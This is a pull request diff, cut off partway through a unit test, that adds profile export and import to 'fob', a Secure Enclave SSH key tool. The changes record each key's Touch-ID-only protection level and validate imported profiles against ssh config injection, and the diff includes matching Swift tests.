### PR TITLE
Move to a new Mac: fob export-profile / import-profile

### DIFF
--- a/Sources/FobApp/AppState.swift
+++ b/Sources/FobApp/AppState.swift
@@ -1247,8 +1247,7 @@ final class AppState: ObservableObject {
     /// hand the new key an open default and drop the old key's pins.
     private func copyPolicy(from: String, to: String) throws {
         guard let store else { return }
-        let policy = try store.loadPolicyForMutation(name: from)
-        try store.savePolicy(policy, name: to)
+        try store.carryPolicy(from: from, to: to)
     }
 
     /// Append an entry to ~/.ssh/allowed_signers (idempotent) so signed commits verify locally.

--- a/Sources/FobKit/KeyPolicy.swift
+++ b/Sources/FobKit/KeyPolicy.swift
@@ -27,9 +27,18 @@ public struct KeyPolicy: Codable {
     /// key for non-optional properties even when they have a default).
     public var namespaceChoiceMade: Bool?
 
+    /// Whether this key was created Touch-ID-only (`.biometryCurrentSet`) rather than accepting any
+    /// user presence (`.userPresence`, which also allows Apple Watch / password). The enclave's
+    /// access control can't be read back from the key blob, so recording it here is the only way to
+    /// know afterwards — needed so migrating to a new Mac can recreate the key at the *same*
+    /// protection level instead of silently downgrading it. Optional: nil = created before this was
+    /// recorded (unknown), matching `namespaceChoiceMade`'s back-compat pattern.
+    public var requireBiometry: Bool?
+
     public var isDefault: Bool {
         pinnedHostKeys.isEmpty && (reuseSeconds ?? 0) <= 0
             && allowedNamespaces == nil && namespaceChoiceMade != true
+            && requireBiometry != true // else savePolicy would drop the record and lose the flag
     }
 
     /// Whether an SSHSIG signature for `namespace` is permitted by this policy.
@@ -46,11 +55,13 @@ public struct KeyPolicy: Codable {
     }
 
     public init(pinnedHostKeys: [Data] = [], reuseSeconds: Double? = nil,
-                allowedNamespaces: [String]? = nil, namespaceChoiceMade: Bool? = nil) {
+                allowedNamespaces: [String]? = nil, namespaceChoiceMade: Bool? = nil,
+                requireBiometry: Bool? = nil) {
         self.pinnedHostKeys = pinnedHostKeys
         self.reuseSeconds = reuseSeconds
         self.allowedNamespaces = allowedNamespaces
         self.namespaceChoiceMade = namespaceChoiceMade
+        self.requireBiometry = requireBiometry
     }
 }
 
@@ -96,6 +107,16 @@ extension KeyStore {
         case .absent: return KeyPolicy()
         case .unreadable: throw KeyStoreError.policyUnreadable(name)
         }
+    }
+
+    /// Carry one key's policy onto another (rotation), **keeping the destination's own protection
+    /// level**. The replacement key is created with a freshly chosen Touch-ID-only setting, so
+    /// copying the retired key's policy wholesale would clobber that choice with the old value.
+    /// Fails closed on either side being unreadable, like every other policy mutation.
+    public func carryPolicy(from: String, to: String) throws {
+        var policy = try loadPolicyForMutation(name: from)
+        policy.requireBiometry = try loadPolicyForMutation(name: to).requireBiometry
+        try savePolicy(policy, name: to)
     }
 
     public func savePolicy(_ policy: KeyPolicy, name: String) throws {

--- a/Sources/FobKit/KeyPolicy.swift
+++ b/Sources/FobKit/KeyPolicy.swift
@@ -3,7 +3,7 @@ import Foundation
 
 /// Per-key signing policy, stored next to the key blob as <name>.policy (JSON).
 /// Absent file = default policy (no pinning, touch required every time).
-public struct KeyPolicy: Codable {
+public struct KeyPolicy: Codable, Equatable {
     /// Host-key blobs this key may sign for. Empty = any destination.
     /// Non-empty = the agent refuses unbound connections and any destination
     /// whose (verified) host key is not in this list.

--- a/Sources/FobKit/KeyStore.swift
+++ b/Sources/FobKit/KeyStore.swift
@@ -163,6 +163,13 @@ public struct KeyStore {
         let key = StoredKey(name: name, dataRepresentation: privateKey.dataRepresentation)
         let pubLine = SSHFormat.authorizedKeysLine(privateKey.publicKey, comment: "fob:\(name)")
         try Data((pubLine + "\n").utf8).write(to: keysDirectory.appendingPathComponent("\(name).pub"))
+        // Record the protection level: the enclave's access control can't be read back from the key
+        // blob, so without this we could never tell afterwards whether a key was Touch-ID-only —
+        // and recreating it on a new Mac would silently downgrade it to any-user-presence. Only
+        // written when true, so a plain userPresence key keeps the "no policy record" default.
+        if requireBiometry {
+            try? savePolicy(KeyPolicy(requireBiometry: true), name: name)
+        }
         return key
     }
 

--- a/Sources/FobKit/Profile.swift
+++ b/Sources/FobKit/Profile.swift
@@ -1,0 +1,228 @@
+import Foundation
+
+/// A portable description of a fob setup, for moving to a new Mac.
+///
+/// Secure Enclave keys are **non-exportable by hardware design** — the on-disk blob is wrapped by
+/// one machine's enclave and is inert anywhere else — so a profile deliberately carries **no key
+/// material**. What it does carry is everything *around* the keys, all of which is public or
+/// reconstructible: key names, their policies, the `~/.ssh/config` host mappings, and the
+/// commit-signing setup. On the new Mac, `fob import-profile` recreates that shape with **fresh**
+/// keys, which then have to be registered on the servers and git hosts (the import prints a
+/// checklist, including each retired key's fingerprint so the old entries can be removed).
+///
+/// Not secret, but not nothing: a profile maps your key names, hosts, users and signing identities.
+/// It's written `0600` and shouldn't be posted or synced casually.
+public struct Profile: Codable, Equatable {
+    /// Bumped when the schema changes incompatibly; `validate` refuses anything newer.
+    public static let currentVersion = 1
+
+    public var version: Int
+    public var exportedAt: String          // ISO-8601, informational only
+    public var keys: [Key]
+    public var hosts: [Host]
+    public var signing: Signing?
+
+    public struct Key: Codable, Equatable {
+        public var name: String
+        /// Always written, even when open/default — absence in the store means "default", which a
+        /// manifest must state explicitly rather than silently skip.
+        public var policy: KeyPolicy
+        /// `SHA256:…` of the key being left behind, so the import checklist can say which entry to
+        /// remove from each host. Never any private material.
+        public var oldFingerprint: String?
+        public var signsCommits: Bool
+        /// Principal from `~/.ssh/allowed_signers`, so the new key can be re-listed under it.
+        public var signingEmail: String?
+
+        public init(name: String, policy: KeyPolicy, oldFingerprint: String? = nil,
+                    signsCommits: Bool = false, signingEmail: String? = nil) {
+            self.name = name
+            self.policy = policy
+            self.oldFingerprint = oldFingerprint
+            self.signsCommits = signsCommits
+            self.signingEmail = signingEmail
+        }
+    }
+
+    /// One `~/.ssh/config` host that routes through fob. Only the four directives fob understands
+    /// are carried (`HostName`/`User`/`Port`/`IdentityFile`); anything else the block contained is
+    /// recorded by *name* in `droppedDirectives` so the import can warn instead of silently losing
+    /// it. Raw block text is deliberately not copied — it can hold `ProxyCommand` lines with
+    /// internal hostnames or tokens, and this file travels between machines.
+    public struct Host: Codable, Equatable {
+        public var alias: String
+        public var hostName: String
+        public var user: String
+        public var port: Int
+        public var keyName: String
+        public var isGitHost: Bool
+        public var droppedDirectives: [String]
+
+        public init(alias: String, hostName: String, user: String, port: Int = 22,
+                    keyName: String, isGitHost: Bool, droppedDirectives: [String] = []) {
+            self.alias = alias
+            self.hostName = hostName
+            self.user = user
+            self.port = port
+            self.keyName = keyName
+            self.isGitHost = isGitHost
+            self.droppedDirectives = droppedDirectives
+        }
+    }
+
+    public struct Signing: Codable, Equatable {
+        /// Path as configured in git (`~`-relative where possible; the importer re-expands it).
+        public var allowedSignersFile: String?
+        public init(allowedSignersFile: String? = nil) { self.allowedSignersFile = allowedSignersFile }
+    }
+
+    public init(version: Int = Profile.currentVersion, exportedAt: String,
+                keys: [Key], hosts: [Host], signing: Signing? = nil) {
+        self.version = version
+        self.exportedAt = exportedAt
+        self.keys = keys
+        self.hosts = hosts
+        self.signing = signing
+    }
+}
+
+// MARK: - Validation
+
+extension Profile {
+    /// Why a profile can't be imported. A manifest is **untrusted input** — it's hand-editable and
+    /// travels between machines — and `HostSetup.configBlock` interpolates its values verbatim into
+    /// `~/.ssh/config`, so a newline in a hostname would inject arbitrary ssh directives and a
+    /// leading `-` would later be read as an ssh option. Everything is re-validated here.
+    public enum Issue: Equatable, CustomStringConvertible {
+        case unsupportedVersion(Int)
+        case invalidKeyName(String)
+        case invalidHostField(alias: String, field: String, value: String)
+        case unknownKeyReference(alias: String, keyName: String)
+        case duplicateKeyName(String)
+        case duplicateAlias(String)
+
+        public var description: String {
+            switch self {
+            case .unsupportedVersion(let v):
+                return "profile version \(v) is newer than this fob understands (\(Profile.currentVersion)) — upgrade fob"
+            case .invalidKeyName(let name):
+                return "invalid key name '\(name)'"
+            case .invalidHostField(let alias, let field, let value):
+                return "host '\(alias)' has an unsafe \(field) value '\(value)'"
+            case .unknownKeyReference(let alias, let keyName):
+                return "host '\(alias)' references key '\(keyName)', which isn't in the profile"
+            case .duplicateKeyName(let name): return "key '\(name)' appears more than once"
+            case .duplicateAlias(let alias): return "host '\(alias)' appears more than once"
+            }
+        }
+    }
+
+    /// Every problem found, empty when the profile is safe to import.
+    public func validate() -> [Issue] {
+        var issues: [Issue] = []
+        if version > Profile.currentVersion { issues.append(.unsupportedVersion(version)) }
+
+        var seenKeys = Set<String>()
+        for key in keys {
+            guard KeyStore.isValidName(key.name) else {
+                issues.append(.invalidKeyName(key.name)); continue
+            }
+            if !seenKeys.insert(key.name).inserted { issues.append(.duplicateKeyName(key.name)) }
+        }
+
+        var seenAliases = Set<String>()
+        for host in hosts {
+            if !HostSetup.isValidHostToken(host.alias) {
+                issues.append(.invalidHostField(alias: host.alias, field: "alias", value: host.alias))
+            }
+            if !HostSetup.isValidHostToken(host.hostName) {
+                issues.append(.invalidHostField(alias: host.alias, field: "HostName", value: host.hostName))
+            }
+            if !HostSetup.isValidHostToken(host.user) {
+                issues.append(.invalidHostField(alias: host.alias, field: "User", value: host.user))
+            }
+            if host.port < 1 || host.port > 65535 {
+                issues.append(.invalidHostField(alias: host.alias, field: "Port", value: String(host.port)))
+            }
+            if !seenAliases.insert(host.alias).inserted { issues.append(.duplicateAlias(host.alias)) }
+            if !keys.contains(where: { $0.name == host.keyName }) {
+                issues.append(.unknownKeyReference(alias: host.alias, keyName: host.keyName))
+            }
+        }
+        return issues
+    }
+}
+
+// MARK: - Import planning
+
+extension Profile {
+    /// What importing would do to one key or host. Computed up front so the whole plan can be shown
+    /// and confirmed before anything is created or written.
+    public struct Plan: Equatable {
+        public var keysToCreate: [Key]
+        public var keysSkipped: [String]        // a key of that name already exists here
+        public var hostsToAdd: [Host]
+        public var hostsSkipped: [(alias: String, reason: String)]
+
+        public var isEmpty: Bool { keysToCreate.isEmpty && hostsToAdd.isEmpty }
+
+        public static func == (a: Plan, b: Plan) -> Bool {
+            a.keysToCreate == b.keysToCreate && a.keysSkipped == b.keysSkipped
+                && a.hostsToAdd == b.hostsToAdd
+                && a.hostsSkipped.map(\.alias) == b.hostsSkipped.map(\.alias)
+        }
+    }
+
+    /// Decide what to import. Never partially applies: existing keys and conflicting hosts are
+    /// skipped with a reason rather than overwritten, so a re-run is safe.
+    public func plan(existingKeys: Set<String>, existingConfig: String) -> Plan {
+        var keysToCreate: [Key] = []
+        var keysSkipped: [String] = []
+        for key in keys {
+            if existingKeys.contains(key.name) { keysSkipped.append(key.name) }
+            else { keysToCreate.append(key) }
+        }
+
+        var hostsToAdd: [Host] = []
+        var hostsSkipped: [(alias: String, reason: String)] = []
+        for host in hosts {
+            // Sibling check first: a shared `Host a b` line also satisfies hostBlockExists, and the
+            // sibling reason is the more useful one to show. Same rule the migrate/adopt flows
+            // enforce — editing such a block silently rewrites the siblings' auth too (CWE-706).
+            let siblings = HostSetup.hostLineSiblings(ofAlias: host.alias, in: existingConfig)
+            if !siblings.isEmpty {
+                hostsSkipped.append((host.alias,
+                    "shares a Host line with \(siblings.joined(separator: ", "))"))
+                continue
+            }
+            if HostSetup.hostBlockExists(alias: host.alias, in: existingConfig) {
+                hostsSkipped.append((host.alias, "a Host block already exists in ~/.ssh/config"))
+                continue
+            }
+            hostsToAdd.append(host)
+        }
+        return Plan(keysToCreate: keysToCreate, keysSkipped: keysSkipped,
+                    hostsToAdd: hostsToAdd, hostsSkipped: hostsSkipped)
+    }
+
+    /// The complete new `~/.ssh/config` text with every planned host appended. Built in one pass and
+    /// written once — appending host-by-host would make `backupAndWriteConfig` overwrite its own
+    /// pristine backup with an already-modified copy (its name is per-second).
+    ///
+    /// `pubPath` and `socketPath` are supplied by the caller from the *new* machine's home
+    /// directory; paths in the profile are never reused.
+    public static func configText(applying hosts: [Host], to config: String,
+                                  socketPath: String,
+                                  pubPath: (String) -> String) -> String {
+        guard !hosts.isEmpty else { return config }
+        var text = config
+        for host in hosts {
+            let block = HostSetup.configBlock(alias: host.alias, host: host.hostName,
+                                              user: host.user, port: host.port,
+                                              pubPath: pubPath(host.keyName), socketPath: socketPath)
+            let separator = text.isEmpty ? "" : (text.hasSuffix("\n") ? "\n" : "\n\n")
+            text += separator + block + "\n"
+        }
+        return text
+    }
+}

--- a/Sources/FobKit/Profile.swift
+++ b/Sources/FobKit/Profile.swift
@@ -86,6 +86,43 @@ public struct Profile: Codable, Equatable {
     }
 }
 
+// MARK: - Export helpers
+
+extension Profile {
+    /// Directives fob understands and regenerates; everything else in a `Host` block is carried
+    /// only as a *name* so the export can warn that it won't survive the move.
+    static let knownDirectives: Set<String> = [
+        "hostname", "user", "port", "identityfile", "identityagent", "identitiesonly",
+    ]
+
+    /// Names of the directives in `alias`'s block that fob does **not** carry (`ProxyJump`,
+    /// `ProxyCommand`, `ForwardAgent`, …). Their values are deliberately not captured: they can
+    /// hold internal hostnames or credentials, and a profile is meant to travel between machines.
+    public static func droppedDirectives(forAlias alias: String, in config: String) -> [String] {
+        var inBlock = false
+        var names: [String] = []
+        for raw in config.split(separator: "\n", omittingEmptySubsequences: false) {
+            let line = raw.trimmingCharacters(in: .whitespaces)
+            if line.isEmpty || line.hasPrefix("#") { continue }
+            let lower = line.lowercased()
+            if lower == "host" || lower.hasPrefix("host ") || lower == "match" || lower.hasPrefix("match ") {
+                if inBlock { break }
+                if lower.hasPrefix("host ") {
+                    let tokens = line.dropFirst(5).split(whereSeparator: { $0 == " " || $0 == "\t" })
+                    if tokens.contains(where: { $0 == Substring(alias) }) { inBlock = true }
+                }
+                continue
+            }
+            guard inBlock,
+                  let sep = line.firstIndex(where: { $0 == " " || $0 == "\t" || $0 == "=" })
+            else { continue }
+            let key = String(line[..<sep])
+            if !knownDirectives.contains(key.lowercased()), !names.contains(key) { names.append(key) }
+        }
+        return names
+    }
+}
+
 // MARK: - Validation
 
 extension Profile {

--- a/Sources/fob/ProfileCommands.swift
+++ b/Sources/fob/ProfileCommands.swift
@@ -1,0 +1,257 @@
+import FobKit
+import Foundation
+
+/// `fob export-profile` / `fob import-profile` — move a fob setup to a new Mac.
+///
+/// Secure Enclave keys can't leave the machine that created them, so this moves everything *around*
+/// them (names, policies, host mappings, signing) and recreates that shape with **fresh** keys on
+/// the new Mac. The import ends with a checklist of where to register each new public key.
+enum ProfileCommands {
+    private static var sshDir: URL {
+        FileManager.default.homeDirectoryForCurrentUser.appendingPathComponent(".ssh")
+    }
+    private static var configURL: URL { sshDir.appendingPathComponent("config") }
+    private static var signersURL: URL { sshDir.appendingPathComponent("allowed_signers") }
+    private static func pubURL(_ name: String) -> URL {
+        sshDir.appendingPathComponent("fob_\(name).pub")
+    }
+
+    /// `SHA256:…` for an authorized_keys-style line, matching what `ssh-keygen -l` prints.
+    private static func fingerprint(ofPubLine line: String) -> String? {
+        let fields = line.split(separator: " ")
+        guard fields.count >= 2, let blob = Data(base64Encoded: String(fields[1])) else { return nil }
+        return HostResolver.fingerprint(ofHostKey: blob)
+    }
+
+    // MARK: - Export
+
+    static func export(store: KeyStore, arguments: [String]) throws {
+        var rest = arguments
+        var output = FileManager.default.currentDirectoryPath + "/fob-profile.json"
+        if let i = rest.firstIndex(of: "--output"), i + 1 < rest.count {
+            output = rest[i + 1]
+            rest.removeSubrange(i...(i + 1))
+        }
+
+        let configText = (try? String(contentsOf: configURL, encoding: .utf8)) ?? ""
+        let signersText = (try? String(contentsOf: signersURL, encoding: .utf8)) ?? ""
+        let blocks = HostSetup.listHostBlocks(in: configText)
+
+        // Keys, with their policies read fail-closed: `displayPolicy` would silently report an
+        // unreadable policy as "open", which would export away the key's pins.
+        var keys: [Profile.Key] = []
+        for stored in try store.all() {
+            let policy: KeyPolicy
+            switch store.policyStatus(name: stored.name) {
+            case .present(let p): policy = p
+            case .absent: policy = KeyPolicy()
+            case .unreadable:
+                fail("policy for '\(stored.name)' is unreadable — fix or remove "
+                    + "~/.fob/keys/\(stored.name).policy before exporting, so its pins aren't lost")
+            }
+            let inStorePub = (try? String(contentsOfFile: store.keysDirectory
+                .appendingPathComponent("\(stored.name).pub").path, encoding: .utf8)) ?? ""
+            keys.append(Profile.Key(
+                name: stored.name,
+                policy: policy,
+                oldFingerprint: fingerprint(ofPubLine: inStorePub),
+                signsCommits: SSHCheckup.AllowedSigners.principal(signersText, fobKeyName: stored.name) != nil,
+                signingEmail: SSHCheckup.AllowedSigners.principal(signersText, fobKeyName: stored.name)))
+        }
+
+        // Host mappings: only blocks whose IdentityFile is a fob key we actually hold.
+        let known = Set(keys.map(\.name))
+        var hosts: [Profile.Host] = []
+        for block in blocks {
+            guard let keyName = block.parsed.identityFiles.compactMap({ path -> String? in
+                let base = (path as NSString).lastPathComponent
+                guard base.hasPrefix("fob_"), base.hasSuffix(".pub") else { return nil }
+                return String(base.dropFirst(4).dropLast(4))
+            }).first(where: { known.contains($0) }) else { continue }
+            let host = block.parsed.hostName ?? block.alias
+            hosts.append(Profile.Host(
+                alias: block.alias, hostName: host,
+                user: block.parsed.user ?? NSUserName(), port: block.parsed.port ?? 22,
+                keyName: keyName,
+                isGitHost: HostSetup.isGitHost(hostName: host, user: block.parsed.user),
+                droppedDirectives: Profile.droppedDirectives(forAlias: block.alias, in: configText)))
+        }
+
+        let profile = Profile(
+            exportedAt: ISO8601DateFormatter().string(from: Date()),
+            keys: keys, hosts: hosts,
+            signing: Profile.Signing(
+                allowedSignersFile: gitConfigGlobal("gpg.ssh.allowedSignersFile").isEmpty
+                    ? nil : gitConfigGlobal("gpg.ssh.allowedSignersFile")))
+
+        let encoder = JSONEncoder()
+        encoder.outputFormatting = [.prettyPrinted, .sortedKeys]
+        let url = URL(fileURLWithPath: (output as NSString).expandingTildeInPath)
+        try encoder.encode(profile).write(to: url, options: .atomic)
+        try FileManager.default.setAttributes([.posixPermissions: 0o600], ofItemAtPath: url.path)
+
+        print("Wrote \(url.path) (0600) — \(keys.count) key(s), \(hosts.count) host(s).")
+        let dropped = hosts.filter { !$0.droppedDirectives.isEmpty }
+        if !dropped.isEmpty {
+            print("")
+            print("Not carried (fob only recreates HostName/User/Port/IdentityFile):")
+            for host in dropped {
+                print("  \(host.alias): \(host.droppedDirectives.joined(separator: ", "))")
+            }
+        }
+        print("")
+        print("This file contains NO key material — enclave keys can't leave this Mac. It does map")
+        print("your key names, hosts and signing identities, so keep it 0600 and don't post it.")
+        print("On the new Mac:  fob import-profile \(url.lastPathComponent)")
+    }
+
+    // MARK: - Import
+
+    static func importProfile(store: KeyStore, arguments: [String]) throws {
+        var rest = arguments
+        let dryRun = rest.contains("--dry-run")
+        let forceBiometry = rest.contains("--require-biometry")
+        rest.removeAll { $0.hasPrefix("--") }
+        guard let path = rest.first, rest.count == 1 else {
+            fail("usage: fob import-profile <profile.json> [--dry-run] [--require-biometry]")
+        }
+
+        let url = URL(fileURLWithPath: (path as NSString).expandingTildeInPath)
+        guard let data = try? Data(contentsOf: url) else { fail("can't read \(url.path)") }
+        guard let profile = try? JSONDecoder().decode(Profile.self, from: data) else {
+            fail("\(url.lastPathComponent) isn't a valid fob profile")
+        }
+
+        // A profile is untrusted input — refuse anything unsafe before it can reach ~/.ssh/config.
+        let issues = profile.validate()
+        guard issues.isEmpty else {
+            for issue in issues { print("error: \(issue)") }
+            fail("profile rejected (\(issues.count) problem(s))")
+        }
+
+        let configText = (try? String(contentsOf: configURL, encoding: .utf8)) ?? ""
+        let existing = Set((try? store.all())?.map(\.name) ?? [])
+        let plan = profile.plan(existingKeys: existing, existingConfig: configText)
+
+        print("From \(url.lastPathComponent) (exported \(profile.exportedAt)):")
+        for key in plan.keysToCreate {
+            let level = (key.policy.requireBiometry ?? forceBiometry)
+                ? "Touch ID only" : "Touch ID, Apple Watch, or password"
+            print("  + key '\(key.name)' (\(level))")
+        }
+        for name in plan.keysSkipped { print("  · key '\(name)' already exists — skipped") }
+        for host in plan.hostsToAdd { print("  + host '\(host.alias)' → \(host.user)@\(host.hostName)") }
+        for skipped in plan.hostsSkipped { print("  · host '\(skipped.alias)' skipped: \(skipped.reason)") }
+        for host in profile.hosts where !host.droppedDirectives.isEmpty {
+            print("  ! '\(host.alias)' had directives fob doesn't carry: \(host.droppedDirectives.joined(separator: ", "))")
+        }
+
+        guard !plan.isEmpty else { print("\nNothing to import."); return }
+
+        let newConfig = Profile.configText(applying: plan.hostsToAdd, to: configText,
+                                           socketPath: store.socketPath,
+                                           pubPath: { pubURL($0).path })
+        if newConfig != configText {
+            print("")
+            Setup.printDiff(configText, newConfig)
+        }
+
+        if dryRun {
+            print("\nDry run — nothing was created or written.")
+            return
+        }
+        guard Setup.confirm("Create these keys and apply the config change?") else {
+            print("Cancelled."); return
+        }
+
+        // 1. Keys + policies. Each key's own protection level is restored; unknown (exported before
+        //    fob recorded it) falls back to --require-biometry, else any-user-presence.
+        var created: [Profile.Key] = []
+        for key in plan.keysToCreate {
+            let biometry = key.policy.requireBiometry ?? forceBiometry
+            do {
+                _ = try store.create(name: key.name, requireBiometry: biometry)
+            } catch {
+                print("error: couldn't create '\(key.name)': \(error.localizedDescription)")
+                continue
+            }
+            var policy = key.policy
+            policy.requireBiometry = biometry
+            try store.savePolicy(policy, name: key.name)
+            let pubLine = SSHFormat.authorizedKeysLine(try store.find(name: key.name).publicKey(),
+                                                       comment: "fob:\(key.name)")
+            try Data((pubLine + "\n").utf8).write(to: pubURL(key.name), options: .atomic)
+            try FileManager.default.setAttributes([.posixPermissions: 0o600],
+                                                  ofItemAtPath: pubURL(key.name).path)
+            created.append(key)
+        }
+
+        // 2. One config write — a per-host loop would let the per-second backup overwrite itself.
+        if newConfig != configText {
+            let backup = try HostSetup.backupAndWriteConfig(newConfig, at: configURL)
+            print("Applied ~/.ssh/config. Backup: \(backup.lastPathComponent)")
+        }
+
+        // 3. Signing: regenerate the wrapper locally and list the NEW public keys under the
+        //    principals carried over.
+        var signersText = (try? String(contentsOf: signersURL, encoding: .utf8)) ?? ""
+        var addedSigners = false
+        for key in created where key.signsCommits {
+            guard let email = key.signingEmail,
+                  let pubLine = try? String(contentsOf: pubURL(key.name), encoding: .utf8)
+                      .trimmingCharacters(in: .whitespacesAndNewlines),
+                  let updated = SSHCheckup.AllowedSigners.appending(signersText, email: email,
+                                                                    pubLine: pubLine) else { continue }
+            signersText = updated
+            addedSigners = true
+        }
+        if addedSigners {
+            try Data(signersText.utf8).write(to: signersURL, options: .atomic)
+            try FileManager.default.setAttributes([.posixPermissions: 0o644],
+                                                  ofItemAtPath: signersURL.path)
+            _ = try? store.ensureSignWrapper()
+            print("Updated ~/.ssh/allowed_signers with the new signing key(s).")
+        }
+
+        printChecklist(profile: profile, created: created)
+    }
+
+    /// What the user still has to do by hand: the new keys are different keys, so every server and
+    /// git host has to trust them (and stop trusting the old ones).
+    private static func printChecklist(profile: Profile, created: [Profile.Key]) {
+        guard !created.isEmpty else { return }
+        print("")
+        print("═══ Register the new keys ═══")
+        print("These are NEW keys — the old ones stayed on the other Mac and can't be moved.")
+
+        for key in created {
+            let pubLine = (try? String(contentsOf: pubURL(key.name), encoding: .utf8))?
+                .trimmingCharacters(in: .whitespacesAndNewlines) ?? ""
+            print("")
+            print("• \(key.name)")
+            print("    \(pubLine)")
+
+            for host in profile.hosts where host.keyName == key.name {
+                if host.isGitHost {
+                    let provider = HostSetup.gitProvider(forHost: host.hostName)
+                    // Only ever a canonical provider URL; never synthesised from the manifest.
+                    if let url = HostSetup.sshKeySettingsURL(forHost: host.hostName) {
+                        print("    \(host.alias): add as an Authentication Key → \(url.absoluteString)")
+                    } else {
+                        print("    \(host.alias): add as an Authentication Key on \(provider.displayName) (\(host.hostName))")
+                    }
+                } else {
+                    print("    \(host.alias): \(HostSetup.fallbackCopyCommand(alias: host.alias, fobPubPath: pubURL(key.name).path, port: host.port))")
+                }
+            }
+            if key.signsCommits {
+                print("    also add it as a Signing Key (a separate entry on GitHub)")
+            }
+            if let old = key.oldFingerprint {
+                print("    then remove the old key (\(old)) from those hosts")
+            }
+        }
+        print("")
+        print("Verify a git host with:  ssh -T <alias>")
+    }
+}

--- a/Sources/fob/Setup.swift
+++ b/Sources/fob/Setup.swift
@@ -196,7 +196,7 @@ enum Setup {
 
     /// Print a +/- unified diff of two config texts (only the changed region is interesting,
     /// but showing context keeps it readable).
-    private static func printDiff(_ old: String, _ new: String) {
+    static func printDiff(_ old: String, _ new: String) {
         for line in TextDiff.lines(old: old, new: new) {
             switch line.kind {
             case .added: print("   + \(line.text)")
@@ -409,7 +409,7 @@ enum Setup {
         return answer
     }
 
-    private static func confirm(_ question: String) -> Bool {
+    static func confirm(_ question: String) -> Bool {
         print("\(question) [Y/n]: ", terminator: "")
         fflush(stdout)
         guard let line = readLine() else { return false }

--- a/Sources/fob/main.swift
+++ b/Sources/fob/main.swift
@@ -40,6 +40,16 @@ USAGE:
       replacement alongside the current key (register its public key on the host);
       --finalize swaps it in and retires the old one. No downtime, no lockout.
 
+  fob export-profile [--output <path>]
+      Write a portable description of this setup — key names, their policies, your
+      ~/.ssh/config host mappings, and the signing setup — to fob-profile.json
+      (0600). Contains NO key material: Secure Enclave keys can't leave this Mac.
+
+  fob import-profile <profile.json> [--dry-run] [--require-biometry]
+      Recreate that setup on a new Mac: fresh enclave keys under the same names
+      and policies, the same ~/.ssh/config entries, then a checklist of where to
+      register each new public key. --dry-run shows the plan and changes nothing.
+
   fob checkup
       Read-only SSH hygiene report: flags unencrypted / weak / loosely-permissioned
       on-disk keys, risky ~/.ssh/config directives, and hosts/signing that could move
@@ -315,6 +325,12 @@ do {
         for key in keys {
             print(SSHFormat.authorizedKeysLine(try key.publicKey(), comment: "fob:\(key.name)"))
         }
+
+    case "export-profile":
+        try ProfileCommands.export(store: store, arguments: Array(arguments.dropFirst()))
+
+    case "import-profile":
+        try ProfileCommands.importProfile(store: store, arguments: Array(arguments.dropFirst()))
 
     case "checkup":
         // fob keys' base64 blobs, so the ssh-agent check can exclude them.

--- a/Sources/fob/main.swift
+++ b/Sources/fob/main.swift
@@ -531,7 +531,7 @@ do {
             // A fob:<name> allowed_signers line ⟺ signing key; carry its principal. nil ⟹ auth-
             // only, so don't touch allowed_signers (avoids adding a spurious line).
             let signingEmail = SSHCheckup.AllowedSigners.principal(signersText, fobKeyName: name)
-            try store.savePolicy(try store.loadPolicyForMutation(name: name), name: temp) // carry pin/reuse/namespaces (fail closed)
+            try store.carryPolicy(from: name, to: temp) // pin/reuse/namespaces (fail closed); keeps the new key's protection level
             try store.rename(from: name, to: "\(name).retired")        // old aside (recoverable)
             try store.rename(from: temp, to: name)                     // new takes the name
             try store.remove(name: "\(name).retired")                  // destroy the old key

--- a/Tests/FobKitTests/PolicyStoreTests.swift
+++ b/Tests/FobKitTests/PolicyStoreTests.swift
@@ -21,6 +21,49 @@ struct ThrowingPolicyStore: PolicyStore {
 
 final class PolicyStoreTests: XCTestCase {
 
+    // MARK: - requireBiometry (protection level)
+
+    /// A Touch-ID-only key must produce a *persisted* record: the enclave's access control can't be
+    /// read back from the blob, so if `isDefault` ignored this flag `savePolicy` would delete the
+    /// record and the setting would be lost (and a migration would silently downgrade the key).
+    func testRequireBiometryIsNotDefaultAndSurvivesSave() throws {
+        XCTAssertTrue(KeyPolicy().isDefault)
+        XCTAssertTrue(KeyPolicy(requireBiometry: false).isDefault, "user-presence is the default")
+        XCTAssertFalse(KeyPolicy(requireBiometry: true).isDefault)
+
+        let memory = InMemoryPolicyStore()
+        let store = KeyStore(directory: try makeTempKeysDir().deletingLastPathComponent(),
+                             policyStore: memory)
+        try store.savePolicy(KeyPolicy(requireBiometry: true), name: "k")
+        XCTAssertEqual(try store.loadPolicyForMutation(name: "k").requireBiometry, true)
+    }
+
+    /// Old `.policy` JSON predates the field, so it must still decode (nil = unknown).
+    func testRequireBiometryDecodesFromLegacyJSON() throws {
+        let legacy = Data(#"{"pinnedHostKeys":[],"reuseSeconds":30}"#.utf8)
+        let policy = try JSONDecoder().decode(KeyPolicy.self, from: legacy)
+        XCTAssertNil(policy.requireBiometry, "unknown, not false")
+        XCTAssertEqual(policy.reuseSeconds, 30)
+    }
+
+    /// Rotation carries the retired key's pins/reuse but must keep the *replacement's* protection
+    /// level — the user re-chooses it when creating the new key.
+    func testCarryPolicyKeepsDestinationProtectionLevel() throws {
+        let memory = InMemoryPolicyStore()
+        let store = KeyStore(directory: try makeTempKeysDir().deletingLastPathComponent(),
+                             policyStore: memory)
+        try store.savePolicy(KeyPolicy(pinnedHostKeys: [Data([9])], reuseSeconds: 30,
+                                       requireBiometry: true), name: "old")
+        try store.savePolicy(KeyPolicy(requireBiometry: false), name: "new")
+
+        try store.carryPolicy(from: "old", to: "new")
+
+        let carried = try store.loadPolicyForMutation(name: "new")
+        XCTAssertEqual(carried.pinnedHostKeys, [Data([9])], "pins carried")
+        XCTAssertEqual(carried.reuseSeconds, 30, "reuse carried")
+        XCTAssertNotEqual(carried.requireBiometry, true, "destination's own level kept, not the old key's")
+    }
+
     // MARK: - FilePolicyStore
 
     func testFileStoreRoundTrip() throws {

--- a/Tests/FobKitTests/ProfileTests.swift
+++ b/Tests/FobKitTests/ProfileTests.swift
@@ -129,6 +129,33 @@ final class ProfileTests: XCTestCase {
                       "names the sibling it would have clobbered")
     }
 
+    // MARK: - Dropped directives (what the export warns about)
+
+    /// Only names are collected, never values — a ProxyCommand can carry internal hosts or
+    /// credentials, and a profile is meant to travel between machines.
+    func testDroppedDirectivesNamesOnlyAndScopedToTheBlock() {
+        let config = """
+        Host web
+          HostName web.example
+          User deploy
+          Port 2222
+          IdentityAgent ~/.fob/agent.sock
+          IdentityFile ~/.ssh/fob_web.pub
+          IdentitiesOnly yes
+          ProxyJump bastion.example
+          ForwardAgent yes
+          # a comment
+
+        Host other
